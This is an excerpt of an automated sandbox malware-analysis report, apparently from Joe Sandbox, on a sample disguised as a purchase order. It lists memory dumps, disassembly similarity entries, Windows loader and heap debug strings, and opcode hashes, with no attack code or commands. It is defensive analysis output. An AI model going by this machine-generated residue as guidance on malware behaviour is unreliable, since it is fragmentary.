                                              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                              • API String ID: 3446177414-2547482624
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI$\U~4
                                              • API String ID: 0-1163839511
                                              Strings
                                              • LdrpInitializeProcess, xrefs: 34848422
                                              • minkernel\ntdll\ldrinit.c, xrefs: 34848421
                                              • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 3484855E
                                              • @, xrefs: 34848591
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                              • API String ID: 0-1918872054
                                              Strings
                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 348822B6
                                              • .Local, xrefs: 348428D8
                                              • SXS: %s() passed the empty activation context, xrefs: 348821DE
                                              • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 348821D9, 348822B1
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                              • API String ID: 0-1239276146
                                              Strings
                                              • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 34870FE5
                                              • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 34871028
                                              • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 3487106B
                                              • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 348710AE
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                              • API String ID: 0-1468400865
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                              • API String ID: 0-2586055223
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                              • API String ID: 2994545307-336120773
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                              • API String ID: 0-1391187441
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID:
                                              • API String ID: 3446177414-0
                                              Strings
                                              • HEAP[%wZ]: , xrefs: 3486F8AA
                                              • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 3486F8CC
                                              • HEAP: , xrefs: 3486F8B7
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                              • API String ID: 0-3178619729
                                              Strings
                                              • HEAP[%wZ]: , xrefs: 34811712
                                              • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 34811728
                                              • HEAP: , xrefs: 34811596
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                              • API String ID: 0-3178619729
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: FilterFullPath$UseFilter$\??\
                                              • API String ID: 0-2779062949
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Objects=%4u$Objects>%4u$VirtualAlloc
                                              • API String ID: 0-3870751728
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %$&$@
                                              • API String ID: 0-1537733988
                                              Strings
                                              • TargetNtPath, xrefs: 348EB82F
                                              • GlobalizationUserSettings, xrefs: 348EB834
                                              • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 348EB82A
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                              • API String ID: 0-505981995
                                              Strings
                                              • HEAP[%wZ]: , xrefs: 3486E6A6
                                              • HEAP: , xrefs: 3486E6B3
                                              • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 3486E6C6
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                              • API String ID: 0-1340214556
                                              Strings
                                              • LdrpCompleteMapModule, xrefs: 3487A590
                                              • Could not validate the crypto signature for DLL %wZ, xrefs: 3487A589
                                              • minkernel\ntdll\ldrmap.c, xrefs: 3487A59A
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                              • API String ID: 0-1676968949
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                              • API String ID: 0-1151232445
                                              Strings
                                              • LdrpAllocateTls, xrefs: 34881B40
                                              • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 34881B39
                                              • minkernel\ntdll\ldrtls.c, xrefs: 34881B4A
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                              • API String ID: 0-4274184382
                                              Strings
                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 348CC1C5
                                              • PreferredUILanguages, xrefs: 348CC212
                                              • @, xrefs: 348CC1F1
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                              • API String ID: 0-2968386058
                                              Strings
                                              • RtlpResUltimateFallbackInfo Enter, xrefs: 3481A2FB
                                              • PS~4, xrefs: 3481A348
                                              • RtlpResUltimateFallbackInfo Exit, xrefs: 3481A309
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: PS~4$RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                              • API String ID: 0-91862635
                                              Strings
                                              • @, xrefs: 3489B670
                                              • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 3489B632
                                              • GlobalFlag, xrefs: 3489B68F
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                              • API String ID: 0-4192008846
                                              Strings
                                              • LdrpInitializeTls, xrefs: 34881A47
                                              • minkernel\ntdll\ldrtls.c, xrefs: 34881A51
                                              • DLL "%wZ" has TLS information at %p, xrefs: 34881A40
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                              • API String ID: 0-931879808
                                              Strings
                                              • LdrpInitializationFailure, xrefs: 348920FA
                                              • minkernel\ntdll\ldrinit.c, xrefs: 34892104
                                              • Process initialization failed with status 0x%08lx, xrefs: 348920F3
                                              Similarity
                                              • API ID:
                                              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                              • API String ID: 0-2986994758
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: RtlValidateHeap
                                              • API String ID: 3446177414-1797218451
                                              Similarity
                                              • API ID:
                                              • String ID: @$@
                                              • API String ID: 0-149943524
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID:
                                              • API String ID: 3446177414-0
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: $$$
                                              • API String ID: 3446177414-233714265
                                              Similarity
                                              • API ID:
                                              • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                              • API String ID: 0-118005554
                                              Strings
                                              • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 34882A95
                                              • RtlpInitializeAssemblyStorageMap, xrefs: 34882A90
                                              Similarity
                                              • API ID:
                                              • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                              • API String ID: 0-2653619699
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID: Cleanup Group$Threadpool!
                                              • API String ID: 2994545307-4008356553
                                              Similarity
                                              • API ID:
                                              • String ID: MUI
                                              • API String ID: 0-1339004836
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID:
                                              • API String ID: 3446177414-0
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID:
                                              • API String ID: 3446177414-0
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID:
                                              • API String ID: 3446177414-0
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID:
                                              • API String ID: 3446177414-0
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID:
                                              • API String ID: 3446177414-0
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID:
                                              • API String ID: 3446177414-0
                                              APIs
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID:
                                              • API String ID: 3446177414-0
                                              Strings
                                              Similarity
                                              • API ID:
                                              • String ID: GlobalTags
                                              • API String ID: 0-1106856819
                                              Strings
                                              Similarity
                                              • API ID:
                                              • String ID: @
                                              • API String ID: 0-2766056989
                                              Strings
                                              Similarity
                                              • API ID:
                                              • String ID: EXT-
                                              • API String ID: 0-1948896318
                                              Strings
                                              Similarity
                                              • API ID:
                                              • String ID: BinaryHash
                                              • API String ID: 0-2202222882
                                              Strings
                                              Similarity
                                              • API ID:
                                              • String ID: verifier.dll
                                              • API String ID: 0-3265496382
                                              Strings
                                              Similarity
                                              • API ID:
                                              • String ID: #
                                              • API String ID: 0-1885708031
                                              Strings
                                              Similarity
                                              • API ID:
                                              • String ID: Flst
                                              • API String ID: 0-2374792617
                                              Strings
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: L4QwL4Qw
                                              • API String ID: 3446177414-1417497668
                                              Strings
                                              Similarity
                                              • API ID:
                                              • String ID: @
                                              • API String ID: 0-2766056989
                                              Strings
                                              Similarity
                                              • API ID:
                                              • String ID: Actx
                                              • API String ID: 0-89312691
                                              Strings
                                              Similarity
                                              • API ID:
                                              • String ID: LdrCreateEnclave
                                              • API String ID: 0-3262589265
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a9c08bf55bab8ceb3ffe6ccb64f09498c6509cd9306e0105f84ce75b7f04b756
                                              • Instruction ID: 574aa26e65d571ed0f5f4872b7348230d6a89141e75c6693ae8d5acf74040d79
                                              • Opcode Fuzzy Hash: a9c08bf55bab8ceb3ffe6ccb64f09498c6509cd9306e0105f84ce75b7f04b756
                                              • Instruction Fuzzy Hash: D0B10575700749EFEB11CBA8C960BAEBBF6AF45310F140359D651EB281DB70E981CB90
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3e332721a910aae71778fd471cf093efe00915f23190599f609534f6fe554e55
                                              • Instruction ID: 09591a0d2e5325a1111e6fdc9efc34e19386f97aa4c0d9f13ebcd4e5246786cc
                                              • Opcode Fuzzy Hash: 3e332721a910aae71778fd471cf093efe00915f23190599f609534f6fe554e55
                                              • Instruction Fuzzy Hash: 65A15CB5900615EFEB12CF68CC91FAE3BB9EF45754F410298F910AB2A0D7B59C51CBA0
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 36a4f10ee20004dd0af4ab6f13a67ebb153a6d421abe331a249c15f671bd4c11
                                              • Instruction ID: 7ece7e0f9d22aa6fb3eb7e0830a80d06f0e30f37f9bfccaafc1178595c00690d
                                              • Opcode Fuzzy Hash: 36a4f10ee20004dd0af4ab6f13a67ebb153a6d421abe331a249c15f671bd4c11
                                              • Instruction Fuzzy Hash: 7FB16D74B102599FEB68CF58CC90BA9B3B5EF44744F4086E9D50AA7250EB74DD85CF20
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: aa09cb3ba0bd58685f420196a3ef97af741ffb6edb1c9794ff16cb34a2cd5a63
                                              • Instruction ID: b7a12dffab49a81195247c115c840fd4be2419dd6fae2acf77dc6569822bd7ae
                                              • Opcode Fuzzy Hash: aa09cb3ba0bd58685f420196a3ef97af741ffb6edb1c9794ff16cb34a2cd5a63
                                              • Instruction Fuzzy Hash: 28A10674B0171ADFEB14CF69C990BAAB7B5FF45358F004269EA15D72A1DB74E802CB80
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3af5b009f404a690d4a7b23759b96833702cf79b04498c8dda0a19ff0bfe3de6
                                              • Instruction ID: 77dd5ce8189c385012d315fa8be1cd6c1265aff71201c02b03b5986ad60c75ea
                                              • Opcode Fuzzy Hash: 3af5b009f404a690d4a7b23759b96833702cf79b04498c8dda0a19ff0bfe3de6
                                              • Instruction Fuzzy Hash: D7919FB5E00619EFEB15CFA8D880BAEBBF5EF48750F114269E510BB360D774D9019BA0
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
